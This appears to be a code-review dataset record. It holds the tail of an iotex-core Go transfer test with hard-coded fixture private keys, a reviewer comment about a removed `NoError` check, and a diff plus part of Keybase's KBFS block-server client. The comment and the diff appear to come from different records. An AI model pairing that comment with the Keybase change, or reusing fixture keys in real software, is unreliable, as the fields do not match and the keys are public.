action pool, //but will stay in action pool (not minted yet) //until all the blocks with preceding nonce arrive TsfPending //This transfer should enable all the pending transfer in action pool be accepted //into block chain. This happens when a transfer with the missing nonce arrives, //filling the gap between minted blocks and pending blocks. 
TsfFinal ) type AccountState int const ( //This account should be created on blockchain in run time with the given balance AcntCreate AccountState = iota //This account already exist, need to load the the key, address, balance to this test case AcntExist //This account doesnt exist on blockchain, but have a valid key and address AcntNotRegistered //This account doesnt exist, the address is not valid (a random byte string) AcntBadAddr ) type simpleTransferTestCfg struct { senderAcntState AccountState senderPriKey crypto.PrivateKey senderBalance *big.Int recvAcntState AccountState recvPriKey crypto.PrivateKey recvBalance *big.Int nonce uint64 amount *big.Int payload []byte gasLimit uint64 gasPrice *big.Int expectedResult TransferState message string } var ( localKeys = []string{ "fd26207d4657c422da8242686ba4f5066be11ffe9d342d37967f9538c44cebbf", "012d7c684388ca7508fb3483f58e29a8de327b28097dd1d207116225307c98bf", "0a653365c521592062fbbd3b8e1fc64a80b6199bce2b1dbac091955b5fe14125", "0b3eb204a1641ea072505eec5161043e8c19bd039fad7f61e2180d4d396af45b", "affad54ae2fd6f139c235439bebb9810ccdd016911113b220af6fd87c952b5bd", "d260035a571390213c8521b73fff47b6fd8ce2474e37a2421bf1d4657e06e3ea", "dee8d3dab8fbf36990608936241d1cc6f7d51663285919806eb05b1365dd62a3", "d08769fb91911eed6156b1ea7dbb8adf3a68b1ed3b4b173074e7a67996d76c5d", "29945a86884def518347585caaddcc9ac08c5d6ca614b8547625541b43adffe7", "c8018d8a2ed602831c3435b03e33669d0f59e29c939764f1b11591175f2fe615", } // In the test case: // - an account with "nil" private key will be created with // keys, address, and initialized with the given balance. // - an account with exiting private key will load exiting // balance into test case. 
getSimpleTransferTests = []simpleTransferTestCfg{ { AcntCreate, nil, big.NewInt(1000000), AcntCreate, nil, big.NewInt(1000000), 1, big.NewInt(100), // nonce, amount make([]byte, 100), //payload uint64(200000), big.NewInt(1), // gasLimit, gasPrice TsfSuccess, "Normal transfer from an account with enough balance and gas", }, { AcntCreate, nil, big.NewInt(232222), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(222222), make([]byte, 0), uint64(200000), big.NewInt(1), TsfSuccess, "Transfer with just enough balance", }, { AcntCreate, nil, big.NewInt(1000000), AcntNotRegistered, nil, big.NewInt(1000000), 1, big.NewInt(100), // nonce, amount make([]byte, 100), //payload uint64(200000), big.NewInt(1), // gasLimit, gasPrice TsfSuccess, "Normal transfer to an address not created on block chain", }, { AcntCreate, nil, big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(0), make([]byte, 4), uint64(200000), big.NewInt(1), TsfSuccess, "Transfer with 0 amount", }, { AcntExist, identityset.PrivateKey(0), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfSuccess, "Transfer with same nonce from a single sender 1", }, { AcntExist, identityset.PrivateKey(1), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 2, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfPending, "Transfer with a sequence of nonce from a single sender 1", }, { AcntExist, identityset.PrivateKey(1), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 3, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfPending, "Transfer with a sequence of nonce from a single sender 2", }, { AcntExist, getLocalKey(0), big.NewInt(30000), AcntCreate, nil, big.NewInt(100000), 2, big.NewInt(20000), make([]byte, 0), uint64(200000), big.NewInt(0), TsfPending, "Transfer to multiple accounts with not enough total balance 1", }, { AcntExist, getLocalKey(0), big.NewInt(30000), AcntCreate, nil, 
big.NewInt(100000), 3, big.NewInt(20000), make([]byte, 4), uint64(200000), big.NewInt(0), TsfPending, "Transfer to multiple accounts with not enough total balance 2", }, { AcntCreate, nil, big.NewInt(1000000), AcntBadAddr, nil, big.NewInt(1000000), 1, big.NewInt(100), // nonce, amount make([]byte, 100), //payload uint64(200000), big.NewInt(1), // gasLimit, gasPrice TsfFail, "Normal transfer to a bad address", }, /* { AcntNotRegistered, nil, big.NewInt(1000000), AcntCreate, nil, big.NewInt(1000000), 1, big.NewInt(100), // nonce, amount make([]byte, 100), //payload uint64(200000), big.NewInt(1), // gasLimit, gasPrice TsfFail, "Normal transfer from an address not created on block chain", }, { AcntCreate, nil, big.NewInt(232221), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(222222), make([]byte, 0), uint64(200000), big.NewInt(1), TsfFail, "Transfer with not enough balance", }, { AcntCreate, nil, big.NewInt(232222), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(222222), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFail, "Transfer with not enough balance with payload", }, */ { AcntCreate, nil, big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(-100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFail, "Transfer with negative amount", }, { AcntCreate, nil, big.NewInt(1000000), AcntCreate, nil, big.NewInt(1000000), 1, big.NewInt(100), make([]byte, 0), uint64(1000), big.NewInt(1), TsfFail, "Transfer with not enough gas limit", }, { AcntCreate, nil, big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 0, big.NewInt(0), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFail, "Transfer with nonce 0", }, { AcntExist, identityset.PrivateKey(0), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFail, "Transfer with same nonce from a single sender 2", }, { AcntExist, identityset.PrivateKey(1), big.NewInt(100000), AcntCreate, nil, big.NewInt(100000), 1, 
big.NewInt(100), make([]byte, 4), uint64(200000), big.NewInt(1), TsfFinal, "Transfer with a sequence of nonce from a single sender 3", }, { AcntExist, getLocalKey(0), big.NewInt(30000), AcntCreate, nil, big.NewInt(100000), 1, big.NewInt(20000), make([]byte, 4), uint64(200000), big.NewInt(0), TsfFinal, "Transfer to multiple accounts with not enough total balance 3", }, } ) func TestLocalTransfer(t *testing.T) { require := require.New(t) testTriePath, err := testutil.PathOfTempFile("trie") require.NoError(err) testDBPath, err := testutil.PathOfTempFile("db") require.NoError(err) testIndexPath, err := testutil.PathOfTempFile("index") require.NoError(err) testBloomfilterIndexPath, err := testutil.PathOfTempFile("bloomfilterIndex") require.NoError(err) testSystemLogPath, err := testutil.PathOfTempFile("systemlog") require.NoError(err) testCandidateIndexPath, err := testutil.PathOfTempFile("candidateIndex") require.NoError(err) defer func() { testutil.CleanupPath(t, testTriePath) testutil.CleanupPath(t, testDBPath) testutil.CleanupPath(t, testIndexPath) testutil.CleanupPath(t, testSystemLogPath) testutil.CleanupPath(t, testBloomfilterIndexPath) testutil.CleanupPath(t, testCandidateIndexPath) }() networkPort := 4689 apiPort := testutil.RandomPort() cfg, err := newTransferConfig(testDBPath, testTriePath, testIndexPath, testBloomfilterIndexPath, testSystemLogPath, testCandidateIndexPath, networkPort, apiPort) defer func() { delete(cfg.Plugins, config.GatewayPlugin) }() require.NoError(err) for i, tsfTest := range getSimpleTransferTests { if tsfTest.senderAcntState == AcntCreate { sk, err := crypto.GenerateKey() require.NoError(err) addr, err := address.FromBytes(sk.PublicKey().Hash()) require.NoError(err) cfg.Genesis.InitBalanceMap[addr.String()] = tsfTest.senderBalance.String() getSimpleTransferTests[i].senderPriKey = sk } if tsfTest.recvAcntState == AcntCreate { sk, err := crypto.GenerateKey() require.NoError(err) addr, err := address.FromBytes(sk.PublicKey().Hash()) 
require.NoError(err) cfg.Genesis.InitBalanceMap[addr.String()] = tsfTest.recvBalance.String() getSimpleTransferTests[i].recvPriKey = sk } } for i := 0; i < len(localKeys); i++ { sk := getLocalKey(i) addr, err := address.FromBytes(sk.PublicKey().Hash()) require.NoError(err) cfg.Genesis.InitBalanceMap[addr.String()] = "30000" } // create server svr, err := itx.NewServer(cfg) require.NoError(err) // Create and start probe server ctx := context.Background() probeSvr := probe.New(7788) require.NoError(probeSvr.Start(ctx)) defer func() { require.NoError(probeSvr.Stop(ctx)) }() // Start server ctx, stopServer := context.WithCancel(ctx) defer stopServer() go itx.StartServer(ctx, svr, probeSvr, cfg) // target address for grpc connection. Default is "127.0.0.1:14014" grpcAddr := fmt.Sprintf("127.0.0.1:%d", apiPort) grpcctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) defer cancel() conn, err := grpc.DialContext(grpcctx, grpcAddr, grpc.WithBlock(), grpc.WithInsecure()) require.NoError(err) defer conn.Close() client := iotexapi.NewAPIServiceClient(conn) chainID := cfg.Chain.ID bc := svr.ChainService(chainID).Blockchain() sf := svr.ChainService(chainID).StateFactory() ap := svr.ChainService(chainID).ActionPool() as := svr.ChainService(chainID).APIServer() for _, tsfTest := range getSimpleTransferTests { senderPriKey, senderAddr, err := initStateKeyAddr(tsfTest.senderAcntState, tsfTest.senderPriKey, tsfTest.senderBalance, bc, sf) require.NoError(err, tsfTest.message) _, recvAddr, err := initStateKeyAddr(tsfTest.recvAcntState, tsfTest.recvPriKey, tsfTest.recvBalance, bc, sf) require.NoError(err, tsfTest.message) tsf, err := testutil.SignedTransfer(recvAddr, senderPriKey, tsfTest.nonce, tsfTest.amount, tsfTest.payload, tsfTest.gasLimit, tsfTest.gasPrice) require.NoError(err, tsfTest.message) // wait 2 block time, retry 5 times retryInterval := cfg.Genesis.BlockInterval * 2 / 5 bo := backoff.WithMaxRetries(backoff.NewConstantBackOff(retryInterval), 5) err = 
backoff.Retry(func() error { _, err := client.SendAction(context.Background(), &iotexapi.SendActionRequest{Action: tsf.Proto()}) return err }, bo) switch tsfTest.expectedResult { case TsfSuccess: require.NoError(err, tsfTest.message) // Wait long enough for a block to be minted, and check the balance of both // sender and receiver. var selp action.SealedEnvelope err := backoff.Retry(func() error { var err error selp, err = as.GetActionByActionHash(tsf.Hash()) return err }, bo) require.NoError(err, tsfTest.message) require.Equal(tsfTest.nonce, selp.Proto().GetCore().GetNonce(), tsfTest.message) require.Equal(senderPriKey.PublicKey().Bytes(), selp.Proto().SenderPubKey, tsfTest.message) newSenderState, _ := accountutil.AccountState(sf, senderAddr) minusAmount := big.NewInt(0).Sub(tsfTest.senderBalance, tsfTest.amount) gasUnitPayloadConsumed := big.NewInt(0).Mul(big.NewInt(int64(action.TransferPayloadGas)), big.NewInt(int64(len(tsfTest.payload)))) gasUnitTransferConsumed := big.NewInt(int64(action.TransferBaseIntrinsicGas)) gasUnitConsumed := big.NewInt(0).Add(gasUnitPayloadConsumed, gasUnitTransferConsumed) gasConsumed := big.NewInt(0).Mul(gasUnitConsumed, tsfTest.gasPrice) expectedSenderBalance := big.NewInt(0).Sub(minusAmount, gasConsumed) require.Equal(expectedSenderBalance.String(), newSenderState.Balance.String(), tsfTest.message) newRecvState, err := accountutil.AccountState(sf, recvAddr) require.NoError(err) expectedRecvrBalance := big.NewInt(0) if tsfTest.recvAcntState == AcntNotRegistered { expectedRecvrBalance.Set(tsfTest.amount) } else { expectedRecvrBalance.Add(tsfTest.recvBalance, tsfTest.amount) } require.Equal(expectedRecvrBalance.String(), newRecvState.Balance.String(), tsfTest.message) case TsfFail: require.Error(err, tsfTest.message) //The transfer should be rejected right after we inject it //Wait long enough to make sure the failed transfer does not exit in either action pool or blockchain err := backoff.Retry(func() error { var err error _, err = 
ap.GetActionByHash(tsf.Hash()) return err }, bo) require.Error(err, tsfTest.message) _, err = as.GetActionByActionHash(tsf.Hash()) require.Error(err, tsfTest.message) if tsfTest.senderAcntState == AcntCreate || tsfTest.senderAcntState == AcntExist { newSenderState, _ := accountutil.AccountState(sf, senderAddr) require.Equal(tsfTest.senderBalance.String(), newSenderState.Balance.String()) } case TsfPending: require.NoError(err, tsfTest.message) //Need to wait long enough to make sure the pending transfer is not minted, only stay in action pool err := backoff.Retry(func() error { var err error _, err = ap.GetActionByHash(tsf.Hash()) return err }, bo) require.NoError(err, tsfTest.message) _, err = as.GetActionByActionHash(tsf.Hash()) require.Error(err, tsfTest.message) case TsfFinal: require.NoError(err, tsfTest.message) //After a blocked is minted, check all the pending transfers in action pool are cleared //This checking procedure is simplified for this test case, because of the complexity of //handling pending transfers. time.Sleep(cfg.Genesis.BlockInterval + time.Second) require.Equal(0, lenPendingActionMap(ap.PendingActionMap()), tsfTest.message) default: require.True(false, tsfTest.message) } } } // initStateKeyAddr, if the given private key is nil, // creates key, address, and init the new account with given balance // otherwise, calculate the the address, and load test with existing // balance state. 
func initStateKeyAddr( accountState AccountState, privateKey crypto.PrivateKey, initBalance *big.Int, bc blockchain.Blockchain, sf factory.Factory, ) (crypto.PrivateKey, string, error) { retKey := privateKey retAddr := "" switch accountState { case AcntCreate: addr, err := address.FromBytes(retKey.PublicKey().Hash()) if err != nil { return nil, "", err } retAddr = addr.String() case AcntExist: addr, err := address.FromBytes(retKey.PublicKey().Hash()) if err != nil { return nil, "", err } retAddr = addr.String() existState, err := accountutil.AccountState(sf, retAddr) if err != nil { return nil, "", err } initBalance.Set(existState.Balance) case AcntNotRegistered: sk, err := crypto.GenerateKey() if err != nil { return nil, "", err } addr, err := address.FromBytes(sk.PublicKey().Hash()) if err != nil { return nil, "", err } retAddr = addr.String() retKey = sk case AcntBadAddr: rand.Seed(time.Now().UnixNano()) b := make([]byte, 41) for i := range b { b[i] = byte(65 + rand.Intn(26)) } retAddr = string(b) } return retKey, retAddr, nil } func getLocalKey(i int) crypto.PrivateKey { sk, _ := crypto.HexStringToPrivateKey(localKeys[i]) return sk } func newTransferConfig( chainDBPath, trieDBPath, indexDBPath string, bloomfilterIndex string, systemLogDBPath string, candidateIndexDBPath string, networkPort, apiPort int, ) (config.Config, error) { cfg := config.Default cfg.Plugins[config.GatewayPlugin] = true cfg.Network.Port = networkPort cfg.Chain.ID = 1 cfg.Chain.ChainDBPath = chainDBPath cfg.Chain.TrieDBPath = trieDBPath cfg.Chain.IndexDBPath = indexDBPath cfg.Chain.BloomfilterIndexDBPath = bloomfilterIndex cfg.System.SystemLogDBPath = systemLogDBPath cfg.Chain.CandidateIndexDBPath = candidateIndexDBPath cfg.Chain.EnableAsyncIndexWrite = true cfg.ActPool.MinGasPriceStr = "0" cfg.Consensus.Scheme = config.StandaloneScheme cfg.API.Port = apiPort cfg.Genesis.BlockInterval = 800 * time.Millisecond return cfg, nil } func lenPendingActionMap(acts 
map[string][]action.SealedEnvelope) int { l := 0 for _, part := range acts { l += len(part) } return l }
1
23,046
think we need to find out the root-cause and fix, instead of just removing `NoError`? it erred b/c `context canceled`, so call this before context cancelled is the right fix
iotexproject-iotex-core
go
@@ -405,7 +405,10 @@ func (b *BlockServerRemote) Get(ctx context.Context, tlfID tlf.ID, id kbfsblock. id, tlfID, context, size) dbc := b.config.DiskBlockCache() if dbc != nil { - go dbc.Put(ctx, tlfID, id, buf, serverHalf) + // This used to be called in a goroutine to prevent blocking + // the `Get`. But we need this cached synchronously for + // later behavior. + dbc.Put(ctx, tlfID, id, buf, serverHalf) } } }()
1
// Copyright 2016 Keybase Inc. All rights reserved. // Use of this source code is governed by a BSD // license that can be found in the LICENSE file. package libkbfs import ( "errors" "sync" "time" "github.com/keybase/backoff" "github.com/keybase/client/go/libkb" "github.com/keybase/client/go/logger" "github.com/keybase/client/go/protocol/keybase1" "github.com/keybase/go-framed-msgpack-rpc/rpc" "github.com/keybase/kbfs/kbfsblock" "github.com/keybase/kbfs/kbfscrypto" "github.com/keybase/kbfs/tlf" "golang.org/x/net/context" ) const ( // BServerTokenServer is the expected server type for bserver authentication. BServerTokenServer = "kbfs_block" // BServerTokenExpireIn is the TTL to use when constructing an authentication token. BServerTokenExpireIn = 2 * 60 * 60 // 2 hours // BServerDefaultPingIntervalSeconds is the default interval on which the // client should contact the block server. BServerDefaultPingIntervalSeconds = 10 // BServerPingTimeout is how long to wait for a ping response // before breaking the connection and trying to reconnect. BServerPingTimeout = 30 * time.Second ) // blockServerRemoteAuthTokenRefresher is a helper struct for // refreshing auth tokens and managing connections. 
type blockServerRemoteClientHandler struct { name string log logger.Logger deferLog logger.Logger csg CurrentSessionGetter authToken *kbfscrypto.AuthToken srvAddr string connOpts rpc.ConnectionOpts rpcLogFactory *libkb.RPCLogFactory pinger pinger connMu sync.RWMutex conn *rpc.Connection client keybase1.BlockInterface } func newBlockServerRemoteClientHandler(name string, log logger.Logger, signer kbfscrypto.Signer, csg CurrentSessionGetter, srvAddr string, rpcLogFactory *libkb.RPCLogFactory) *blockServerRemoteClientHandler { deferLog := log.CloneWithAddedDepth(1) b := &blockServerRemoteClientHandler{ name: name, log: log, deferLog: deferLog, csg: csg, srvAddr: srvAddr, rpcLogFactory: rpcLogFactory, } b.pinger = pinger{ name: name, doPing: b.pingOnce, timeout: BServerPingTimeout, log: log, } b.authToken = kbfscrypto.NewAuthToken( signer, BServerTokenServer, BServerTokenExpireIn, "libkbfs_bserver_remote", VersionString(), b) constBackoff := backoff.NewConstantBackOff(RPCReconnectInterval) b.connOpts = rpc.ConnectionOpts{ DontConnectNow: true, // connect only on-demand WrapErrorFunc: libkb.WrapError, TagsFunc: libkb.LogTagsFromContext, ReconnectBackoff: func() backoff.BackOff { return constBackoff }, } b.initNewConnection() return b } func (b *blockServerRemoteClientHandler) initNewConnection() { b.connMu.Lock() defer b.connMu.Unlock() if b.conn != nil { b.conn.Shutdown() } b.conn = rpc.NewTLSConnection( b.srvAddr, kbfscrypto.GetRootCerts(b.srvAddr), kbfsblock.BServerErrorUnwrapper{}, b, b.rpcLogFactory, b.log, b.connOpts) b.client = keybase1.BlockClient{Cli: b.conn.GetClient()} } func (b *blockServerRemoteClientHandler) shutdown() { if b.authToken != nil { b.authToken.Shutdown() } b.connMu.Lock() defer b.connMu.Unlock() if b.conn != nil { b.conn.Shutdown() } // cancel the ping ticker b.pinger.cancelTicker() } func (b *blockServerRemoteClientHandler) getConn() *rpc.Connection { b.connMu.RLock() defer b.connMu.RUnlock() return b.conn } func (b 
*blockServerRemoteClientHandler) getClient() keybase1.BlockInterface { b.connMu.RLock() defer b.connMu.RUnlock() return b.client } type ctxBServerResetKeyType int const ( // ctxBServerResetKey identifies whether the current context has // already passed through `BServerRemote.resetAuth`. ctxBServerResetKey ctxBServerResetKeyType = iota ) // resetAuth is called to reset the authorization on a BlockServer // connection. func (b *blockServerRemoteClientHandler) resetAuth( ctx context.Context, c keybase1.BlockInterface) (err error) { ctx = context.WithValue(ctx, ctxBServerResetKey, b.name) defer func() { b.deferLog.CDebugf( ctx, "BlockServerRemote: resetAuth called, err: %#v", err) }() session, err := b.csg.GetCurrentSession(ctx) if err != nil { b.log.CDebugf( ctx, "%s: User logged out, skipping resetAuth", b.name) return nil } // request a challenge challenge, err := c.GetSessionChallenge(ctx) if err != nil { return err } // get a new signature signature, err := b.authToken.Sign(ctx, session.Name, session.UID, session.VerifyingKey, challenge) if err != nil { return err } return c.AuthenticateSession(ctx, signature) } // RefreshAuthToken implements the AuthTokenRefreshHandler interface. func (b *blockServerRemoteClientHandler) RefreshAuthToken( ctx context.Context) { if v := ctx.Value(ctxBServerResetKey); v == b.name { b.log.CDebugf(ctx, "Avoiding resetAuth recursion") return } if err := b.resetAuth(ctx, b.client); err != nil { b.log.CDebugf(ctx, "%s: error refreshing auth token: %v", b.name, err) } } var _ kbfscrypto.AuthTokenRefreshHandler = (*blockServerRemoteClientHandler)(nil) // HandlerName implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) HandlerName() string { return b.name } // OnConnect implements the ConnectionHandler interface. 
func (b *blockServerRemoteClientHandler) OnConnect(ctx context.Context, conn *rpc.Connection, client rpc.GenericClient, _ *rpc.Server) error { // reset auth -- using client here would cause problematic recursion. c := keybase1.BlockClient{Cli: client} err := b.resetAuth(ctx, c) if err != nil { return err } // Start pinging. b.pinger.resetTicker(BServerDefaultPingIntervalSeconds) return nil } // OnConnectError implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) OnConnectError(err error, wait time.Duration) { b.log.Warning("%s: connection error: %v; retrying in %s", b.name, err, wait) if b.authToken != nil { b.authToken.Shutdown() } b.pinger.cancelTicker() // TODO: it might make sense to show something to the user if this is // due to authentication, for example. } // OnDoCommandError implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) OnDoCommandError(err error, wait time.Duration) { b.log.Warning("%s: DoCommand error: %v; retrying in %s", b.name, err, wait) } // OnDisconnected implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) OnDisconnected(ctx context.Context, status rpc.DisconnectStatus) { if status == rpc.StartingNonFirstConnection { b.log.CWarningf(ctx, "%s: disconnected", b.name) } if b.authToken != nil { b.authToken.Shutdown() } b.pinger.cancelTicker() } // ShouldRetry implements the ConnectionHandler interface. 
func (b *blockServerRemoteClientHandler) ShouldRetry(rpcName string, err error) bool { //do not let connection.go's DoCommand retry any batch rpcs automatically //because i will manually retry them without successfully completed references switch rpcName { case "keybase.1.block.delReferenceWithCount": return false case "keybase.1.block.archiveReferenceWithCount": return false case "keybase.1.block.archiveReference": return false } if _, ok := err.(kbfsblock.BServerErrorThrottle); ok { return true } if quotaErr, ok := err.(kbfsblock.BServerErrorOverQuota); ok && quotaErr.Throttled { return true } return false } // ShouldRetryOnConnect implements the ConnectionHandler interface. func (b *blockServerRemoteClientHandler) ShouldRetryOnConnect(err error) bool { _, inputCanceled := err.(libkb.InputCanceledError) return !inputCanceled } var _ rpc.ConnectionHandler = (*blockServerRemoteClientHandler)(nil) func (b *blockServerRemoteClientHandler) pingOnce(ctx context.Context) { _, err := b.getClient().BlockPing(ctx) if err == context.DeadlineExceeded { b.log.CDebugf( ctx, "%s: Ping timeout -- reinitializing connection", b.name) b.initNewConnection() } else if err != nil { b.log.CDebugf(ctx, "%s: ping error %s", b.name, err) } } type blockServerRemoteConfig interface { diskBlockCacheGetter codecGetter signerGetter currentSessionGetterGetter logMaker } // BlockServerRemote implements the BlockServer interface and // represents a remote KBFS block server. type BlockServerRemote struct { config blockServerRemoteConfig shutdownFn func() log traceLogger deferLog traceLogger blkSrvAddr string putConn *blockServerRemoteClientHandler getConn *blockServerRemoteClientHandler } // Test that BlockServerRemote fully implements the BlockServer interface. var _ BlockServer = (*BlockServerRemote)(nil) // NewBlockServerRemote constructs a new BlockServerRemote for the // given address. 
func NewBlockServerRemote(config blockServerRemoteConfig, blkSrvAddr string, rpcLogFactory *libkb.RPCLogFactory) *BlockServerRemote { log := config.MakeLogger("BSR") deferLog := log.CloneWithAddedDepth(1) bs := &BlockServerRemote{ config: config, log: traceLogger{log}, deferLog: traceLogger{deferLog}, blkSrvAddr: blkSrvAddr, } // Use two separate auth clients -- one for writes and one for // reads. This allows small reads to avoid getting trapped behind // large asynchronous writes. TODO: use some real network QoS to // achieve better prioritization within the actual network. bs.putConn = newBlockServerRemoteClientHandler( "BlockServerRemotePut", log, config.Signer(), config.CurrentSessionGetter(), blkSrvAddr, rpcLogFactory) bs.getConn = newBlockServerRemoteClientHandler( "BlockServerRemoteGet", log, config.Signer(), config.CurrentSessionGetter(), blkSrvAddr, rpcLogFactory) bs.shutdownFn = func() { bs.putConn.shutdown() bs.getConn.shutdown() } return bs } // For testing. func newBlockServerRemoteWithClient(config blockServerRemoteConfig, client keybase1.BlockInterface) *BlockServerRemote { log := config.MakeLogger("BSR") deferLog := log.CloneWithAddedDepth(1) bs := &BlockServerRemote{ config: config, log: traceLogger{log}, deferLog: traceLogger{deferLog}, putConn: &blockServerRemoteClientHandler{ log: log, deferLog: deferLog, client: client, }, getConn: &blockServerRemoteClientHandler{ log: log, deferLog: deferLog, client: client, }, } return bs } // RemoteAddress returns the remote bserver this client is talking to func (b *BlockServerRemote) RemoteAddress() string { return b.blkSrvAddr } // RefreshAuthToken implements the AuthTokenRefreshHandler interface. 
func (b *BlockServerRemote) RefreshAuthToken(ctx context.Context) { b.putConn.RefreshAuthToken(ctx) b.getConn.RefreshAuthToken(ctx) } func makeBlockIDCombo(id kbfsblock.ID, context kbfsblock.Context) keybase1.BlockIdCombo { // ChargedTo is somewhat confusing when this BlockIdCombo is // used in a BlockReference -- it just refers to the original // creator of the block, i.e. the original user charged for // the block. // // This may all change once we implement groups. return keybase1.BlockIdCombo{ BlockHash: id.String(), ChargedTo: context.GetCreator(), BlockType: context.GetBlockType(), } } func makeBlockReference(id kbfsblock.ID, context kbfsblock.Context) keybase1.BlockReference { // Block references to MD blocks are allowed, because they can be // deleted in the case of an MD put failing. return keybase1.BlockReference{ Bid: makeBlockIDCombo(id, context), // The actual writer to modify quota for. ChargedTo: context.GetWriter(), Nonce: keybase1.BlockRefNonce(context.GetRefNonce()), } } // Get implements the BlockServer interface for BlockServerRemote. 
func (b *BlockServerRemote) Get(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context) ( buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf, err error) { size := -1 b.log.LazyTrace(ctx, "BServer: Get %s", id) defer func() { b.log.LazyTrace(ctx, "BServer: Get %s done (err=%v)", id, err) if err != nil { b.deferLog.CWarningf( ctx, "Get id=%s tlf=%s context=%s sz=%d err=%v", id, tlfID, context, size, err) } else { b.deferLog.CDebugf( ctx, "Get id=%s tlf=%s context=%s sz=%d", id, tlfID, context, size) dbc := b.config.DiskBlockCache() if dbc != nil { go dbc.Put(ctx, tlfID, id, buf, serverHalf) } } }() arg := keybase1.GetBlockArg{ Bid: makeBlockIDCombo(id, context), Folder: tlfID.String(), } res, err := b.getConn.getClient().GetBlock(ctx, arg) if err != nil { return nil, kbfscrypto.BlockCryptKeyServerHalf{}, err } size = len(res.Buf) serverHalf, err = kbfscrypto.ParseBlockCryptKeyServerHalf(res.BlockKey) if err != nil { return nil, kbfscrypto.BlockCryptKeyServerHalf{}, err } return res.Buf, serverHalf, nil } // Put implements the BlockServer interface for BlockServerRemote. func (b *BlockServerRemote) Put(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, bContext kbfsblock.Context, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) (err error) { dbc := b.config.DiskBlockCache() if dbc != nil { go dbc.Put(ctx, tlfID, id, buf, serverHalf) } size := len(buf) b.log.LazyTrace(ctx, "BServer: Put %s", id) defer func() { b.log.LazyTrace(ctx, "BServer: Put %s done (err=%v)", id, err) if err != nil { b.deferLog.CWarningf( ctx, "Put id=%s tlf=%s context=%s sz=%d err=%v", id, tlfID, bContext, size, err) } else { b.deferLog.CDebugf( ctx, "Put id=%s tlf=%s context=%s sz=%d", id, tlfID, bContext, size) } }() arg := keybase1.PutBlockArg{ Bid: makeBlockIDCombo(id, bContext), // BlockKey is misnamed -- it contains just the server // half. 
BlockKey: serverHalf.String(), Folder: tlfID.String(), Buf: buf, } // Handle OverQuota errors at the caller return b.putConn.getClient().PutBlock(ctx, arg) } // PutAgain implements the BlockServer interface for BlockServerRemote func (b *BlockServerRemote) PutAgain(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, bContext kbfsblock.Context, buf []byte, serverHalf kbfscrypto.BlockCryptKeyServerHalf) (err error) { dbc := b.config.DiskBlockCache() if dbc != nil { go dbc.Put(ctx, tlfID, id, buf, serverHalf) } size := len(buf) b.log.LazyTrace(ctx, "BServer: Put %s", id) defer func() { b.log.LazyTrace(ctx, "BServer: Put %s done (err=%v)", id, err) if err != nil { b.deferLog.CWarningf( ctx, "Put id=%s tlf=%s context=%s sz=%d err=%v", id, tlfID, bContext, size, err) } else { b.deferLog.CDebugf( ctx, "Put id=%s tlf=%s context=%s sz=%d", id, tlfID, bContext, size) } }() arg := keybase1.PutBlockAgainArg{ BlockKey: serverHalf.String(), Folder: tlfID.String(), Buf: buf, Ref: makeBlockReference(id, bContext), } // Handle OverQuota errors at the caller return b.putConn.getClient().PutBlockAgain(ctx, arg) } // AddBlockReference implements the BlockServer interface for BlockServerRemote func (b *BlockServerRemote) AddBlockReference(ctx context.Context, tlfID tlf.ID, id kbfsblock.ID, context kbfsblock.Context) (err error) { b.log.LazyTrace(ctx, "BServer: AddRef %s", id) defer func() { b.log.LazyTrace(ctx, "BServer: AddRef %s done (err=%v)", id, err) if err != nil { b.deferLog.CWarningf( ctx, "AddBlockReference id=%s tlf=%s context=%s err=%v", id, tlfID, context, err) } else { b.deferLog.CDebugf( ctx, "AddBlockReference id=%s tlf=%s context=%s", id, tlfID, context) } }() // Handle OverQuota errors at the caller return b.putConn.getClient().AddReference(ctx, keybase1.AddReferenceArg{ Ref: makeBlockReference(id, context), Folder: tlfID.String(), }) } // RemoveBlockReferences implements the BlockServer interface for // BlockServerRemote func (b *BlockServerRemote) 
RemoveBlockReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap) (liveCounts map[kbfsblock.ID]int, err error) { // TODO: Define a more compact printout of contexts. b.log.LazyTrace(ctx, "BServer: RemRef %v", contexts) defer func() { b.log.LazyTrace(ctx, "BServer: RemRef %v done (err=%v)", contexts, err) if err != nil { b.deferLog.CWarningf(ctx, "RemoveBlockReferences batch size=%d err=%v", len(contexts), err) } else { b.deferLog.CDebugf(ctx, "RemoveBlockReferences batch size=%d", len(contexts)) } }() doneRefs, err := b.batchDowngradeReferences(ctx, tlfID, contexts, false) liveCounts = make(map[kbfsblock.ID]int) for id, nonces := range doneRefs { for _, count := range nonces { if existing, ok := liveCounts[id]; !ok || existing > count { liveCounts[id] = count } } } return liveCounts, err } // ArchiveBlockReferences implements the BlockServer interface for // BlockServerRemote func (b *BlockServerRemote) ArchiveBlockReferences(ctx context.Context, tlfID tlf.ID, contexts kbfsblock.ContextMap) (err error) { b.log.LazyTrace(ctx, "BServer: ArchiveRef %v", contexts) defer func() { b.log.LazyTrace(ctx, "BServer: ArchiveRef %v done (err=%v)", contexts, err) if err != nil { 